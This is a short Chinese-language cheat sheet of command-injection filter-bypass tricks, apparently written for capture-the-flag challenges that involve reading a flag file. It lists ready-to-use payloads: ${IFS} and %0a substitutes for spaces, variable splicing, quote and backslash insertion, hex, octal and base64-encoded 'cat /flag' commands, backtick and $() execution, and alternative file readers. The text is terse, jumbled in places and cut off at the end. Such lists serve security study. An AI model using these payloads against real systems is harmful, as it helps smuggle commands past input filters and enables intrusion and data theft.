绕过技巧:
cat 233.txt # 管道符号绕过
# 空格绕过 ${IFS}
# %0a、%09 # 重定向绕过 < <>
# 变量拼接绕过 @kali:$ a=c;b=at;c=fl;d=ag;$a$b $c$d # 单引号、双引号绕过 ca''t flag cat"" flag
# 编码绕过
$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag
#{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag #$(printf "\154\163") ==>ls
$(printf "\154\163") # 查看等价替换
- more:一页一页的显示档案内容
- less:与more类似,但是比more更好的是,他可以[pg dn][pg up]翻页(3)head:查看头几行
(4)tac:从最后一行开始显示,可以看出tac是cat的反向显示(5)tail:查看尾几行
(6)nl:显示的时候,顺便输出行号(7)od:以二进制的方式读取档案内容(8)vi:一种编辑器
(9)vim:一种编辑器(10)sort:可以查看(11)uniq:可以查看(12)file -f:报错出具体内容# 反斜线绕过 c\at fl\ag
# 内敛注释绕过 #`命令`和$(命令)都是执行命令的方式 echo "m0re`cat flag`" echo "m0re $(cat flag)"
# base64编码绕过 `echo "Y2F0IGZsYWc="|base64 -d` # 绕过长度限制
# >命令会将原有文件内容覆盖 echo '123'>xxoo.txt # >>符号的作用是将字符串添加到文件内容末尾,不会覆盖原内容 echo '233'>>xxoo.txt
# 命令换行绕过
ca\ a\
